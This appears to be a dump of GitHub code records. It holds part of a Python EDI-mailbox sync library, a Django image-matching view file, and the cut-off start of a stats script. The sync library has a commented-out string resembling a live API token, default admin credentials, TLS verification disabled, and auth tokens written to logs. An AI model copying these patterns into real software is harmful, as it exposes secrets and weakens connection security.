(i.previous).replace(\"\\n\", \"\")\n\n _txt_status = \"Success\"\n if txt.find(\"751\") >= 0:\n _txt_status = \"Error\"\n response = False\n\n LogActivity(subject=\"LOGOUT\", status=_txt_status, message=str(txt))\n\n except Exception as txt:\n LogActivity(subject=\"LOGOUT\", status='Error', message=str(txt))\n pass\n\n return response\n\n def get_link(self, session):\n obj = []\n try:\n etd = str((datetime.now() - timedelta(days=1)).strftime(\"%Y%m%d\"))\n # etd = '20220501'\n # get cookies after login.\n if session.status_code == 200:\n # get html page\n url = f\"{self.host}/cehttp/servlet/MailboxServlet\"\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n payload = f\"operation=DIRECTORY&fromdate={etd}&Submit=Receive\"\n r = requests.request(\n \"POST\",\n url,\n data=payload,\n headers=headers,\n verify=False,\n timeout=3,\n cookies=session.cookies,\n )\n # print(type(r))\n soup = BeautifulSoup(r.text, \"html.parser\")\n for tr in soup.find_all(\"tr\"):\n found = False\n i = 0\n docs = []\n for td in tr.find_all(\"td\"):\n txt = (td.text).rstrip().lstrip()\n docs.append(txt)\n if td.find(\"a\") != None:\n found = True\n\n if found is True: # False =debug,True=prod.\n if len(docs) >= 9:\n # if str(docs[3])[: len(\"OES.VCBI.32T5\")] == \"OES.VCBI.32T5\":\n # print(docs[3])\n \n l = ObjectLink(\n self.host,\n self.service_type,\n docs[0],\n docs[1],\n str(docs[2]).replace(\",\", \"\").strip(),\n docs[3],\n f\"{docs[4]} {docs[5]}\",\n docs[6],\n docs[7],\n docs[8],\n found,\n )\n obj.append(l)\n\n i += 1\n\n print(colored(f\"found new link => {len(obj)}\", \"green\"))\n LogActivity(subject=\"GET LINK\", status='Success',\n message=f\"FOUND NEW LINK({len(obj)})\")\n\n except Exception as ex:\n LogActivity(subject=\"GET LINK\", status='Error', message=str(ex))\n pass\n\n return obj\n \n def spec_download_gedi_files(self, session, obj):\n filename = f\"{obj['destination']}/{obj['batchid']}.{obj['batchfile']}\"\n try:\n # print(obj)\n # makedir folder gedi is exits\n os.makedirs(obj['destination'], exist_ok=True)\n # download file\n request = requests.get(\n obj['linkfile'],\n stream=True,\n verify=False,\n cookies=session.cookies,\n allow_redirects=True,\n )\n docs = BeautifulSoup(request.content, \"lxml\")\n\n # Write data to GEDI File\n f = open(filename, mode=\"a\", encoding=\"ascii\", newline=\"\\r\\n\")\n for p in docs:\n f.write(p.text)\n f.close()\n\n LogActivity(subject=\"DOWNLOAD\", status='Success',\n message=f\"Download GEDI FILE({obj['batchfile']})\")\n\n except Exception as ex:\n LogActivity(subject=\"DOWNLOAD\", status='Error', message=str(ex))\n filename = None\n pass\n return filename\n\n def download_gedi_files(self, session, obj):\n filename = f\"{obj.destination}/{obj.batchid}.{obj.batchfile}\"\n try:\n # print(obj)\n # makedir folder gedi is exits\n os.makedirs(obj.destination, exist_ok=True)\n # download file\n request = requests.get(\n obj.linkfile,\n stream=True,\n verify=False,\n cookies=session.cookies,\n allow_redirects=True,\n )\n docs = BeautifulSoup(request.content, \"lxml\")\n\n # Write data to GEDI File\n f = open(filename, mode=\"a\", encoding=\"ascii\", newline=\"\\r\\n\")\n for p in docs:\n f.write(p.text)\n f.close()\n\n LogActivity(subject=\"DOWNLOAD\", status='Success',\n message=f\"Download GEDI FILE({obj.batchfile})\")\n\n except Exception as ex:\n LogActivity(subject=\"DOWNLOAD\", status='Error', message=str(ex))\n filename = None\n pass\n return filename\n\n\nclass SplApi:\n def __init__(self, host=\"http://localhost:8080\", username=\"admin\", password=\"admin@spl\"):\n self.host = host\n self.username = username\n self.password = urllib.parse.quote(password)\n \n def __trim_txt(self, txt):\n return str(txt).lstrip().rstrip()\n \n def __check_partname(self, fac, part):\n p = str(part).lstrip().rstrip().replace(\".\", \"\")\n partname = p\n if fac == \"AW\":\n try:\n k = str(p[: p.index(\" \")]).strip()\n s = p[len(k) :]\n ss = s.strip()\n sn = str(ss[: ss.index(\" \")]).strip()\n ssize = str(ss[: ss.index(\" \")])\n\n if len(sn) > 1:\n ssize = str(f\"{sn[:1]}.{sn[1:]}\").strip()\n\n c = str(p[(len(k) + len(ssize)) + 1 :]).strip()\n partname = f\"{k} {ssize} {c}\"\n except:\n pass\n finally:\n pass\n\n return partname\n\n def __re_partname(self, txt):\n return (str(txt).replace(\"b\", \"\")).replace(\"'\", \"\")\n\n def __pono(self, txt):\n return str(self.__re_partname(txt)).strip()\n \n def line_notification(self, msg):\n url = \"https://notify-api.line.me/api/notify\"\n payload = f\"message={msg}\"\n headers = {\n \"Authorization\": f\"Bearer {os.getenv('LINE_NOTIFICATION_TOKEN')}\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n }\n\n # BugDWScwhYvjVc5EyRi5sa28LmJxE2G5NIJsrs6vEV7\n\n response = requests.request(\n \"POST\", url, headers=headers, data=payload.encode(\"utf-8\")\n )\n\n print(f\"line status => {response}\")\n if response.status_code == 200:return True\n return False\n\n def login(self):\n try:\n url = f\"{self.host}/login\"\n payload = f'empcode={self.username}&password={self.password}'\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n if response.status_code == 200:\n obj = response.json()\n LogActivity(name='SPL',subject=\"LOGIN\", status='Success', message=f\"Token is {obj['token']}\")\n return obj['token']\n \n except Exception as ex:\n LogActivity(name='SPL',subject=\"LOGIN\", status='Error', message=str(ex))\n pass\n\n return None\n\n def logout(self, token):\n try:\n url = f\"{self.host}/logout\"\n payload = {}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n LogActivity(name='SPL',subject=\"LOGOUT\", status='Success', message=f\"Logoff By {token}\")\n return True\n \n except Exception as ex:\n LogActivity(name='SPL',subject=\"LOGOUT\", status='Error', message=str(ex))\n pass\n\n return False\n \n def upload(self, whsId, typeName, batchId, filepath, filename, token):\n try:\n url = f\"{self.host}/gedi/store\"\n payload={\n 'filename': filename,\n 'whs_id': whsId,\n 'file_type': typeName,\n 'batch_id': batchId\n }\n files=[\n ('file',(filename,open(filepath,'rb'),'application/octet-stream'))\n ]\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n # print(response.text)\n if response.status_code == 200:\n LogActivity(name='SPL', subject=\"UPLOAD\", status='Success',message=f\"Upload GEDI({filename})\")\n return True\n \n except Exception as ex:\n LogActivity(name='SPL', subject=\"UPLOAD\", status='Error',message=str(ex))\n pass\n \n return False\n \n def get_link(self, token, status=0):\n url = f\"{self.host}/gedi/get/{status}\"\n payload={}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n obj = response.json()\n return obj['data']\n \n return False\n \n def header_receive(self, fileNamme):\n fac = fileNamme[fileNamme.find(\"SPL\") - 2 : fileNamme.find(\"SPL\") - 1]\n plantype = \"RECEIVE\"\n cd = 20\n unit = \"BOX\"\n recisstype = \"01\"\n factory = \"INJ\"\n if fac != \"5\":\n factory = \"AW\"\n plantype = \"RECEIVE\"\n cd = 10\n unit = \"COIL\"\n recisstype = \"01\"\n \n return {\n \"plantype\": plantype,\n \"cd\": cd,\n \"unit\": unit,\n \"recisstype\": recisstype,\n \"factory\": factory,\n }\n \n def read_receive(self, obj, line):\n cd = obj['cd']\n unit = obj['unit']\n recisstype = obj['recisstype']\n plantype = obj['plantype']\n factory = obj['factory']\n return {\n \"factory\": factory,\n \"faczone\": str(line[4 : (4 + 3)]).lstrip().rstrip(),\n \"receivingkey\": str(line[4 : (4 + 12)]).lstrip().rstrip(),\n \"partno\": str(line[76 : (76 + 25)]).lstrip().rstrip(),\n \"partname\": str(line[101 : (101 + 25)]).lstrip().rstrip(),\n \"vendor\": factory,\n \"cd\": cd,\n \"unit\": unit,\n \"whs\": factory,\n \"tagrp\": \"C\",\n \"recisstype\": recisstype,\n \"plantype\": plantype,\n \"recid\": str(line[0:4]).lstrip().rstrip(),\n \"aetono\": str(line[4 : (4 + 12)]).lstrip().rstrip(),\n \"aetodt\": str(line[16 : (16 + 10)]).lstrip().rstrip(),\n \"aetctn\": float(str(line[26 : (26 + 9)]).lstrip().rstrip()),\n \"aetfob\": float(str(line[35 : (35 + 9)]).lstrip().rstrip()),\n \"aenewt\": float(str(line[44 : (44 + 11)]).lstrip().rstrip()),\n \"aentun\": str(line[55 : (55 + 5)]).lstrip().rstrip(),\n \"aegrwt\": float(str(line[60 : (60 + 11)]).lstrip().rstrip()),\n \"aegwun\": str(line[71 : (71 + 5)]).lstrip().rstrip(),\n \"aeypat\": str(line[76 : (76 + 25)]).lstrip().rstrip(),\n \"aeedes\": str(\n self.__check_partname(\n factory, self.__re_partname(line[101 : (101 + 25)])\n )\n ),\n \"aetdes\": str(\n self.__check_partname(\n factory, self.__re_partname(line[101 : (101 + 25)])\n )\n ),\n \"aetarf\": float(str(line[151 : (151 + 10)]).lstrip().rstrip()),\n \"aestat\": float(str(line[161 : (161 + 10)]).lstrip().rstrip()),\n \"aebrnd\": float(str(line[171 : (171 + 10)]).lstrip().rstrip()),\n \"aertnt\": float(str(line[181 : (181 + 5)]).lstrip().rstrip()),\n \"aetrty\": float(str(line[186 : (186 + 5)]).lstrip().rstrip()),\n \"aesppm\": float(str(line[191 : (191 + 5)]).lstrip().rstrip()),\n \"aeqty1\": float(str(line[196 : (196 + 9)]).lstrip().rstrip()),\n \"aeqty2\": float(str(line[205 : (205 + 9)]).lstrip().rstrip()),\n \"aeuntp\": float(str(line[214 : (214 + 9)]).lstrip().rstrip()),\n \"aeamot\": float(str(line[223 : (223 + 11)]).lstrip().rstrip()),\n \"plnctn\": float(str(line[26 : (26 + 9)]).lstrip().rstrip()),\n \"plnqty\": float(str(line[196 : (196 + 9)]).lstrip().rstrip()),\n \"minimum\": 0,\n \"maximum\": 0,\n \"picshelfbin\": \"PNON\",\n \"stkshelfbin\": \"SNON\",\n \"ovsshelfbin\": \"ONON\",\n \"picshelfbasicqty\": 0,\n \"outerpcs\": 0,\n \"allocateqty\": 0,\n \"sync\": False,\n \"updatedon\": datetime.now(),\n }\n\n def header_orderplan(self, fileName):\n fac = fileName[fileName.find(\"SPL\") - 2 : fileName.find(\"SPL\") - 1]\n plantype = \"ORDERPLAN\"\n cd = 20\n unit = \"BOX\"\n sortg1 = \"PARTTYPE\"\n sortg2 = \"PARTNO\"\n sortg3 = \"\"\n factory = \"INJ\"\n \n if fac != \"5\":\n factory = \"AW\"\n plantype = \"ORDERPLAN\"\n cd = 10\n unit = \"COIL\"\n sortg1 = \"PONO\"\n sortg2 = \"PARTTYPE\"\n sortg3 = \"PARTNO\"\n \n return {\n 'factory': factory,\n 'plantype': plantype,\n 'cd': cd,\n 'unit': unit,\n 'sortg1': sortg1,\n 'sortg2': sortg2,\n 'sortg3': sortg3,\n } \n \n def read_orderplan(self, obj, line):\n plantype = obj['plantype']\n cd = obj['cd']\n unit = obj['unit']\n sortg1 = obj['sortg1']\n sortg2 = obj['sortg2']\n sortg3 = obj['sortg3']\n factory = obj['factory']\n oqty = str(self.__trim_txt(line[89 : (89 + 9)]))\n if oqty == \"\":\n oqty = 0\n\n return {\n \"vendor\": factory,\n \"cd\": cd,\n \"unit\": unit,\n \"whs\": factory,\n \"tagrp\": \"C\",\n \"factory\": factory,\n \"sortg1\": sortg1,\n \"sortg2\": sortg2,\n \"sortg3\": sortg3,\n \"plantype\": plantype,\n \"orderid\": str(self.__trim_txt(line[13 : (13 + 15)])),\n # remove space\n \"pono\": str(self.__pono(line[13 : (13 + 15)])),\n \"recid\": str(self.__trim_txt(line[0:4])),\n \"biac\": str(self.__trim_txt(line[5 : (5 + 8)])),\n \"shiptype\": str(self.__trim_txt(line[4 : (4 + 1)])),\n \"etdtap\": datetime.strptime(\n str(self.__trim_txt(line[28 : (28 + 8)])), \"%Y%m%d\"\n ),\n \"partno\": str(self.__trim_txt(line[36 : (36 + 25)])),\n \"partname\": str(\n self.__check_partname(\n factory,\n self.__pono(line[61 : (61 + 25)]),\n )\n ),\n \"pc\": str(self.__trim_txt(line[86 : (86 + 1)])),\n \"commercial\": str(self.__trim_txt(line[87 : (87 + 1)])),\n \"sampleflg\": str(self.__trim_txt(line[88 : (88 + 1)])),\n \"orderorgi\": int(oqty),\n \"orderround\": int(str(self.__trim_txt(line[98 : (98 + 9)]))),\n \"firmflg\": str(self.__trim_txt(line[107 : (107 + 1)])),\n \"shippedflg\": str(self.__trim_txt(line[108 : (108 + 1)])),\n \"shippedqty\": float(str(self.__trim_txt(line[109 : (109 + 9)]))),\n \"ordermonth\": datetime.strptime(\n str(self.__trim_txt(line[118 : (118 + 8)])), \"%Y%m%d\"\n ),\n \"balqty\": float(str(self.__trim_txt(line[126 : (126 + 9)]))),\n \"bidrfl\": str(self.__trim_txt(line[135 : (135 + 1)])),\n \"deleteflg\": str(self.__trim_txt(line[136 : (136 + 1)])),\n \"ordertype\": str(self.__trim_txt(line[137 : (137 + 1)])),\n \"reasoncd\": str(self.__trim_txt(line[138 : (138 + 3)])),\n \"upddte\": datetime.strptime(\n str(self.__trim_txt(line[141 : (141 + 14)])), \"%Y%m%d%H%M%S\"\n ),\n \"updtime\": datetime.strptime(\n str(self.__trim_txt(line[141 : (141 + 14)])), \"%Y%m%d%H%M%S\"\n ),\n \"carriercode\": str(self.__trim_txt(line[155 : (155 + 4)])),\n \"bioabt\": int(str(self.__trim_txt(line[159 : (159 + 1)]))),\n \"bicomd\": str(self.__trim_txt(line[160 : (160 + 1)])),\n \"bistdp\": float(str(self.__trim_txt(line[165 : (165 + 9)]))),\n \"binewt\": float(str(self.__trim_txt(line[174 : (174 + 9)]))),\n \"bigrwt\": float(str(self.__trim_txt(line[183 : (183 + 9)]))),\n \"bishpc\": str(self.__trim_txt(line[192 : (192 + 8)])),\n \"biivpx\": str(self.__trim_txt(line[200 : (200 + 2)])),\n \"bisafn\": str(self.__trim_txt(line[202 : (202 + 6)])),\n \"biwidt\": float(str(self.__trim_txt(line[212 : (212 + 4)]))),\n \"bihigh\": float(str(self.__trim_txt(line[216 : (216 + 4)]))),\n \"bileng\": float(str(self.__trim_txt(line[208 : (208 + 4)]))),\n \"lotno\": str(self.__trim_txt(line[220 : (220 + 8)])),\n \"minimum\": 0,\n \"maximum\": 0,\n \"picshelfbin\": \"PNON\",\n \"stkshelfbin\": \"SNON\",\n \"ovsshelfbin\": \"ONON\",\n \"picshelfbasicqty\": 0,\n \"outerpcs\": 0,\n \"allocateqty\": 0,\n \"sync\": False,\n \"updatedon\": datetime.strptime(\n str(self.__trim_txt(line[141 : (141 + 14)])), \"%Y%m%d%H%M%S\"\n ),\n }\n \n def get_file(self, name, fileName):\n is_success = True\n try:\n url = f\"{str(self.host).replace('/api/v1', '')}{fileName}\"\n payload={}\n headers = {}\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n \n ### create temp file\n f = open(name, mode='w+', encoding='utf-8')\n f.write(str(response.text).replace('\\n', ''))\n f.close()\n \n return name\n \n except Exception as ex:\n pass\n \n \n return is_success\n \n def update_status(self, token, batchId, status=0):\n url = f\"{self.host}/gedi/update/{batchId}\"\n payload=f'is_downloaded={status}&is_active=1'\n headers = {\n 'Authorization': f'Bearer {token}',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\n response = requests.request(\"PUT\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n return True\n \n return False\n \n def get_receive(self, token, status=0):\n url = f\"{self.host}/receive/header/index/{status}\"\n payload={}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n if response.status_code != 200:return False\n data = response.json()\n return data['data']\n \n def update_receive_ent(self, token, receive_id, is_sync=0, status=1):\n url = f\"{self.host}/receive/header/update/{receive_id}\"\n payload=f'receive_sync={is_sync}&active={status}'\n headers = {\n 'Authorization': f'Bearer {token}',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n response = requests.request(\"PUT\", url, headers=headers, data=payload)\n if response.status_code != 200:return False\n data = response.json()\n return data['data']\n \n def get_receive_body(self, token, receive_id, status=1):\n url = f\"{self.host}/receive/body/index/{status}/{receive_id}\"\n payload={}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n if response.status_code != 200:\n return False\n \n data = response.json()\n return data['data']\n \n\n def get_order_plan(self, token, limit=100, is_sync=0, status=1):\n url = f\"{self.host}/order/plan/index/{status}/{is_sync}/{limit}\"\n payload={}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code != 200:\n return False\n \n data = response.json()\n return data['data']\n \n async def serial_no_tracking(self, token=None, obj=[]):\n async with aiohttp.ClientSession() as session:\n url = f\"{self.host}/trigger/store\"\n payload = json.dumps(obj)\n \n print(obj)\n \n headers = {\n 'Content-Type': 'application/json'\n }\n async with session.post(url, headers=headers, data=payload) as res:\n pokemon = await res.json()\n print(pokemon)\n # requests.request(\"POST\", url, headers=headers, data=payload)\n \n return True\n \n def update_receive_trigger(self, obj):\n # print(obj['serial_no'])\n try:\n url = f\"{self.host}/trigger/receive\"\n payload = json.dumps({\n \"receive_no\": obj[\"receive_no\"],\n \"part_no\": obj[\"part_no\"],\n \"lot_no\": obj[\"lot_no\"],\n \"serial_no\": obj[\"serial_no\"],\n \"case_id\": obj[\"case_id\"],\n \"std_pack_qty\": obj[\"std_pack_qty\"],\n \"shelve\": obj[\"shelve\"],\n \"pallet_no\": obj[\"pallet_no\"],\n \"transfer_out\": obj[\"transfer_out\"],\n \"event_trigger\": obj[\"event_trigger\"]\n })\n \n headers = {\n 'Content-Type': 'application/json'\n }\n requests.request(\"POST\", url, headers=headers, data=payload)\n \n except Exception as ex:\n LogActivity(name='SPL', subject=\"SERIAL TRACKING\", status='Error',message=str(ex))\n pass\n \n return True", "repo_name": "abe27/sync_ck_cloud", "sub_path": "spllibs.py", "file_name": "spllibs.py", "file_ext": "py", "file_size_in_byte": 29331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "name"}, {"api_name": "shareplum.Office365", "line_number": 34, "usage_type": "call"}, {"api_name": "shareplum.Site", "line_number": 35, "usage_type": "call"}, {"api_name": "shareplum.site.Version.v365", "line_number": 35, "usage_type": "attribute"}, {"api_name": "shareplum.site.Version", "line_number": 35, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 115, "usage_type": "name"}, {"api_name": "urllib.parse.quote", "line_number": 139, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 139, "usage_type": "attribute"}, {"api_name": "urllib3.disable_warnings", "line_number": 144, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 145, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 149, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 172, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 182, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 202, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 202, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 202, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 210, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 220, "usage_type": "call"}, {"api_name": "{'datetime': 'datetime.datetime'}", "line_number": 236, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 253, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 268, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 270, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 277, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 299, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 301, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 308, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 330, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 330, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 368, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 374, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 389, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 409, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 437, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 456, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 546, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 546, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 607, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 607, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 625, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 625, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 633, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 633, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 636, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 636, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 661, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 661, "usage_type": "name"}, {"api_name": "requests.request", "line_number": 672, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 695, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 708, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 720, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 731, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 746, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 755, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 757, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 775, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 791, "usage_type": "call"}]} +{"seq_id": "28980162239", "text": "\n\nfrom urllib import response\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport numpy as np\nfrom werkzeug.utils import secure_filename\n\n\n# from django.core.files import default_storage\nfrom . import Operations\nimport cv2\nimport json\n# Create your views here.\n\n# Method to handle request for Retreiving the details of the scanned dendrite image. \ndef post1(request):\n handler = Operations.Operations()\n print(\"Scan called\")\n\n if request.method == 'POST':\n if request.FILES['file']:\n file = request.FILES['file']\n else:\n msg = \"No file sent\"\n return HttpResponse(json.dumps(msg))\n \n if file:\n \n image = cv2.imdecode(np.frombuffer(file.read(), np.uint8), cv2.IMREAD_UNCHANGED)\n image = cv2.rotate(image,rotateCode=cv2.ROTATE_90_CLOCKWISE)\n resizeDIm = (int(image.shape[1]*20/100),int(image.shape[0]*20/100))\n image = cv2.resize(image,resizeDIm,interpolation=cv2.INTER_AREA)\n image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n # cv2.imshow(\" \",image)\n # cv2.waitKey(0)\n # file_name = default_storage.save(filename,file)\n \n# finding the image stored in database and retreiving the details of the image\n check = handler.image_Compare(image)\n if check != \"No Match\":\n data = handler.select_match(check[1])\n msg = {\"Match\":\"1\", \n \"prodID\": str(data[0]),\n \"brand\":str(data[1]),\n \"disc\":str(data[2]),\n \"cat\":str(data[3]),\n \"mfg\": str(data[4]),\n \"exp\": str(data[5])\n }\n return HttpResponse(json.dumps(msg))\n else:\n print(\"No match found\")\n msg = {\"Match\":\"-1\"}\n return HttpResponse(json.dumps(msg))\n\n# Method to handle request to register the captured dendrite image on database\ndef post2(request):\n print(\"Register called\")\n handler = Operations.Operations()\n if request.method == 'POST':\n if request.FILES['file']:\n \n file = request.FILES['file']\n else:\n msg = \"No file sent\"\n \n return HttpResponse(json.dumps(msg))\n brand = request.POST.get(\"brnd\")\n disc = request.POST.get(\"disc\")\n cat = request.POST.get(\"cat\")\n mfg = request.POST.get(\"mfgdate\")\n exp = request.POST.get(\"expdate\")\n \n if file:\n # flname = secure_filename(file.filename)\n \n image = cv2.imdecode(np.frombuffer(file.read(), np.uint8), cv2.IMREAD_UNCHANGED)\n image = cv2.rotate(image,rotateCode=cv2.ROTATE_90_CLOCKWISE)\n resizeDIm = (int(image.shape[1]*20/100),int(image.shape[0]*20/100))\n image = cv2.resize(image,resizeDIm,interpolation=cv2.INTER_AREA)\n image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n \n # file_name = default_storage.save(filename,file)\n\n hashofImg = handler.hash_function(image)\n img = handler.encode_img(image)\n task = (hashofImg,img,brand,disc,cat,mfg,exp)\n# checks if the captured image exists in database \n check = handler.image_Compare(image)\n if (check == \"No Match\"):\n handler.insert_row(task)\n print(\"No Match found\")\n msg = {\"Match\":\"2\"}\n return HttpResponse(json.dumps(msg))\n else:\n print(\"Match Found\")\n msg = {\"Match\":\"-1\"}\n return HttpResponse(json.dumps(msg))\n\n# method to handle the request to update the details of the stored dendrite \ndef post3(request):\n print(\"Update Called\")\n handler = Operations.Operations()\n if request.method == \"POST\":\n\n id = request.POST.get(\"id\")\n brand = request.POST.get(\"brnd\")\n disc = request.POST.get(\"disc\")\n cat = request.POST.get(\"cat\")\n mfg = request.POST.get(\"mfgdate\")\n exp = request.POST.get(\"expdate\")\n task=[id,brand,disc,cat,mfg,exp]\n# method to update record in database \n handler.update_info(task)\n print(\"Record Updated\")\n# method to retreive the updated record.\n data = handler.select_match(id)\n print(data[4]+\" \"+data[5])\n msg = {\"Match\":\"3\", \n \"prodID\": str(data[0]),\n \"brand\":str(data[1]),\n \"disc\":str(data[2]),\n \"cat\":str(data[3]),\n \"mfg\": str(data[4]),\n \"exp\": str(data[5])\n }\n return HttpResponse(json.dumps(msg))\n\n \n", "repo_name": "AsatiHimanshu/densecServerDemo", "sub_path": "densecID/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.http.HttpResponse", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.rotate", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_CLOCKWISE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponse", "line_number": 51, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 68, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 78, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 78, "usage_type": "attribute"}, {"api_name": "cv2.rotate", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_CLOCKWISE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 81, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponse", "line_number": 95, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 95, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 99, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 128, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "27875981708", "text": "from __future__ import annotations\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tqdm.auto import tqdm\n\nfrom ..utils import build_gt_id2annotations\nfrom ..utils import build_pr_id2annotations\nfrom ..utils import COLORS\nfrom ..utils import load_json_from_file\nfrom ..utils import transform_gt_into_pr\nfrom ..utils import update_scores\nfrom .count_stats import init_stats\nfrom .count_stats import update_stats\n\n\ndef count_point(gt_ann, pr_ann, score_thres, weighted):\n gt = load_json_from_file(gt_ann)\n pr = load_json_from_file(pr_ann)\n\n pr = update_scores(pr, score_thres)\n\n categories = gt['categories']\n\n stats = 